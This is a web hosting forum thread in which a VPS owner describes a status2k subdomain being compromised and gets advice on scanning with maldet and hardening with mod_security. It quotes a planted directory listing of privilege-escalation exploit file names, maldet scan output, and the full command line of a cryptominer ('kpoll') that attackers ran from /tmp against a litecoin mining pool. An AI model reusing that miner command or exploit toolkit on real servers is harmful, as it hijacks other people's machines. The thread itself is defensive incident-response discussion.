  1. #1

    One of my sites hacked - not sure how (maybe status2k)

    Today I discovered that one of my subdomains on my own VMware VPS was hacked. It's strange, since I only use that subdomain to host a status2k site that gives information to my main status2k site.

    I have several VPS servers around the world, and every one of them uses status2k, on their own subdomains.

    I have checked all my other sites, and only one site was hacked. My VPS is a VMware 10 virtual machine with CentOS 6.4, updated with all the latest updates.
    I'm using ConfigServer Security & Firewall - csf v6.36 with an IP allow list of only my home network, and some of my VPS servers.
    I'm using Virtualmin as control panel.

    The site that was hacked only had a status2k installation on it.
    The install directory was removed.
    I used a unique FTP password for the site (6 numbers, 5 letters and an underscore, so no easy password). And a long generated MySQL password.

    As far as I can see the only hack was that somebody has uploaded an index.html file on the site. I can not find any other changes.
    I have some other domains on the same server, and no other sites were affected. Somewhat strange, since the subdomain is not the main site on my server.

    I have shut down my server now, and will do a new CentOS installation on a new virtual machine. But I can't understand how somebody hacked my server. And why did they only hack a subdomain never used? Why did they not hack all the sites on my server?

    Can people hack status2k sites easily? I'm using their 3.1 version.

    Any advice on how to secure my other status2k sites more than I have today?


    And here is the index.html content:

    <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 3.2 Final//EN">
    <html>
    <head>
    <title>Index of /02/sphider/admin/cgi/enlightenment</title>
    </head>
    <body>
    <h1>Index of /02/sphider/admin/cgi/enlightenment</h1>
    <table><tr><th><img src="/icons/blank.gif" alt="[ICO]"></th><th><a href="?C=N;O=D">Name</a></th><th><a href="?C=M;O=A">Last modified</a></th><th><a href="?C=S;O=A">Size</a></th><th><a href="?C=D;O=A">Description</a></th></tr><tr><th colspan="5"><hr></th></tr>
    <tr><td valign="top"><img src="/icons/back.gif" alt="[DIR]"></td><td><a href="/02/sphider/admin/cgi/">Parent Directory</a></td><td>&nbsp;</td><td align="right"> - </td><td>&nbsp;</td></tr>
    <tr><td valign="top"><img src="/icons/unknown.gif" alt="[ ]"></td><td><a href="exp_abacus.so">exp_abacus.so</a></td><td align="right">29-May-2013 03:17 </td><td align="right"> 14K</td><td>&nbsp;</td></tr>
    <tr><td valign="top"><img src="/icons/unknown.gif" alt="[ ]"></td><td><a href="exp_cheddarbay.so">exp_cheddarbay.so</a></td><td align="right">29-May-2013 03:17 </td><td align="right">5.6K</td><td>&nbsp;</td></tr>
    <tr><td valign="top"><img src="/icons/text.gif" alt="[TXT]"></td><td><a href="exp_framework.h">exp_framework.h</a></td><td align="right">26-May-2013 09:17 </td><td align="right">4.8K</td><td>&nbsp;</td></tr>
    <tr><td valign="top"><img src="/icons/unknown.gif" alt="[ ]"></td><td><a href="exp_ingom0wnar.so">exp_ingom0wnar.so</a></td><td align="right">29-May-2013 03:17 </td><td align="right">6.5K</td><td>&nbsp;</td></tr>
    <tr><td valign="top"><img src="/icons/unknown.gif" alt="[ ]"></td><td><a href="exp_moosecox.so">exp_moosecox.so</a></td><td align="right">29-May-2013 03:17 </td><td align="right">7.9K</td><td>&nbsp;</td></tr>
    <tr><td valign="top"><img src="/icons/unknown.gif" alt="[ ]"></td><td><a href="exp_paokara.so">exp_paokara.so</a></td><td align="right">29-May-2013 03:17 </td><td align="right">5.8K</td><td>&nbsp;</td></tr>
    <tr><td valign="top"><img src="/icons/unknown.gif" alt="[ ]"></td><td><a href="exp_powerglove.so">exp_powerglove.so</a></td><td align="right">29-May-2013 03:17 </td><td align="right">5.2K</td><td>&nbsp;</td></tr>
    <tr><td valign="top"><img src="/icons/unknown.gif" alt="[ ]"></td><td><a href="exp_sieve.so">exp_sieve.so</a></td><td align="right">29-May-2013 03:17 </td><td align="right">9.7K</td><td>&nbsp;</td></tr>
    <tr><td valign="top"><img src="/icons/unknown.gif" alt="[ ]"></td><td><a href="exp_therebel.so">exp_therebel.so</a></td><td align="right">29-May-2013 03:17 </td><td align="right">5.3K</td><td>&nbsp;</td></tr>
    <tr><td valign="top"><img src="/icons/unknown.gif" alt="[ ]"></td><td><a href="exp_vmware.so">exp_vmware.so</a></td><td align="right">29-May-2013 03:17 </td><td align="right">5.5K</td><td>&nbsp;</td></tr>
    <tr><td valign="top"><img src="/icons/unknown.gif" alt="[ ]"></td><td><a href="exp_wunderbar.so">exp_wunderbar.so</a></td><td align="right">29-May-2013 03:17 </td><td align="right">6.1K</td><td>&nbsp;</td></tr>
    <tr><td valign="top"><img src="/icons/unknown.gif" alt="[ ]"></td><td><a href="exploit">exploit</a></td><td align="right">29-May-2013 03:17 </td><td align="right"> 40K</td><td>&nbsp;</td></tr>
    <tr><td valign="top"><img src="/icons/image2.gif" alt="[IMG]"></td><td><a href="funny.jpg">funny.jpg</a></td><td align="right">31-Mar-2009 19:50 </td><td align="right"> 66K</td><td>&nbsp;</td></tr>
    <tr><td valign="top"><img src="/icons/text.gif" alt="[TXT]"></td><td><a href="run_nonnull_exploits.sh">run_nonnull_exploits.sh</a></td><td align="right">20-Sep-2009 18:23 </td><td align="right"> 42 </td><td>&nbsp;</td></tr>
    <tr><td valign="top"><img src="/icons/text.gif" alt="[TXT]"></td><td><a href="run_null_exploits.sh">run_null_exploits.sh</a></td><td align="right">25-May-2013 23:39 </td><td align="right">2.7K</td><td>&nbsp;</td></tr>
    <tr><th colspan="5"><hr></th></tr>
    </table>
    <address>Apache/2.2.16 (Debian) Server at utopia-doujinshi.info Port 80</address>
    </body></html>
    My Top 20 benchmark list (and review site)
    Powered by: Kimsufi, backed up by: Hetzner, DigitalOcean and Vultr.com
    Also using
    SolaDrive.com (45+ months), KnownHost.com (45+ months)

  2. #2
    Hey Kenneth,

    I can't comment on how easily exploitable the status2k script is. A quick Google search does show some exploits known about since 2010. What I can do, however, is offer some recommendations on how to check your server for the potential exploit area.

    One of the services I recommend to customers is "maldet". It will scan your website files and identify known signatures for exploitable code. This will give you an idea of how the exploit happened and what you may need to secure.

    You can learn more about maldet at: https://www.rfxn.com/projects/linux-malware-detect/

    Give that a try: a full scan of the server (typically I would only do the web folders, but to ensure you're not rooted, do a full scan first).
    Regards,
    Josh Dargie
    GreenGeeks.com
    Developer & Designer Friendly Web Hosting

  4. #4
    Scanned my VPS with LMD now, and this is the result:

    malware detect scan report for vps44.xxxxxxxxxxx:
    SCAN ID: 120113-0020.3931
    TIME: Dec 1 00:21:05 +0100
    PATH: /home
    TOTAL FILES: 5436
    TOTAL HITS: 1
    TOTAL CLEANED: 0

    NOTE: quarantine is disabled! set quar_hits=1 in conf.maldet or to quarantine results run: maldet -q 120113-0020.3931
    FILE HIT LIST:
    {HEX}php.exe.globals.387 : /home/xx(not the domain that was hacked)xx/public_html/stats/webdesing.xxxxxxxxxxxx/Browsers.htm
    ===============================================
    Linux Malware Detect v1.4.2 < [email protected] >
    Since the only hit is an htm file in a directory on another domain on my server, is it possible that it's the reason for the hack? The two domains have nothing to do with one another, and do not share the same domain at all. (The one hacked was a subdomain of domain1; the other domain with the hit is domain2.com.)

  5. #5
    Kenneth,

    It's very well possible, especially if they share the same cPanel account. Most hosting providers auto-configure the cPanel on a VPS so there's already "cPanel to cPanel" attack protection. However, the main thing most people forget is that multiple websites hosted inside one cPanel account are all accessible via the main FTP/cPanel login details. This will allow exploits to touch whatever they like inside the cPanel account.

    My recommendation would be to do away with that file or whatever command is on line 387. From there, do a quick password update on the account and monitor for strange activity. The last recommendation I could offer is to ensure you're operating Mod_security. ConfigServer has a great management plugin for ease of use (http://configserver.com/cp/cmc.html) and AtomiCorp offers some useful rules (both free but delayed, and paid rules) at https://www.atomicorp.com/products/modsecurity.html

    Having Mod Security in place will watch for known exploit signatures and prevent them from executing. If something triggers that affects your primary website functions, you can simply disable that individual rule but keep yourself for the most part protected.

  6. #6
    Today I got a suspension on one of my VPS servers because of high CPU usage from a script.
    At almost the same time I saw my CPU usage going really high on one of my other VPS servers.

    I did find a script called "kpoll" running from my /tmp folder. The file was created by my status2k user on 30 Nov this year.

    The script was running this on my server:
    tmp/kpoll -B -q --url=stratum+tcp://ltc.give-me-coins.com:3333 -u unixminer.am -p fiLSs
    All of my sites using status2k had the same script in the /tmp folder; all of them were created on 30 Nov and all of them were created by the status2k user.

    There has to be a major security issue in status2k. I have now removed all status2k sites from all my servers, and removed the "kpoll" script from every server.
    I will never use status2k on any of my servers again, that's for sure.
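As an added example (not from the thread or from status2k), a small POSIX shell triage for the pattern in post #6: processes whose binary resolves under /tmp, and executables owned by a given site user. The function names and the `status2kuser` account name are assumptions; it expects Linux with /proc mounted.

```shell
#!/bin/sh
# Added example: post-compromise triage for a miner dropped in /tmp and
# run under the web application's user. Assumes Linux with /proc mounted.

# Print "<pid> <exe>" for every process whose executable resolves under DIR.
# A binary launched from /tmp or /dev/shm shows up here even if it was
# unlinked afterwards (readlink then appends " (deleted)" to the path).
procs_running_from() {
  dir="$1"
  for p in /proc/[0-9]*; do
    # Kernel threads and other users' processes (when not root) are skipped.
    exe=$(readlink "$p/exe" 2>/dev/null) || continue
    case "$exe" in
      "$dir"/*) printf '%s %s\n' "${p#/proc/}" "$exe" ;;
    esac
  done
}

# Print regular executable files under DIR owned by USER, e.g. the
# status2k site account. -xdev keeps find on one filesystem.
exec_files_owned_in() {
  dir="$1"; user="$2"
  find "$dir" -xdev -user "$user" -type f -perm -u+x -print 2>/dev/null
}

# Number of such files; anything non-zero in /tmp deserves a look.
count_exec_files_owned_in() {
  exec_files_owned_in "$1" "$2" | wc -l | tr -d ' '
}

# Typical use, run as root for full coverage (status2kuser is an
# assumed account name):
#   procs_running_from /tmp; procs_running_from /dev/shm
#   exec_files_owned_in /tmp status2kuser
```

Pair the process listing with `ls -l /proc/<pid>/cwd` and the file's mtime to tie the binary back to the account and date it was dropped, as post #6 did.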
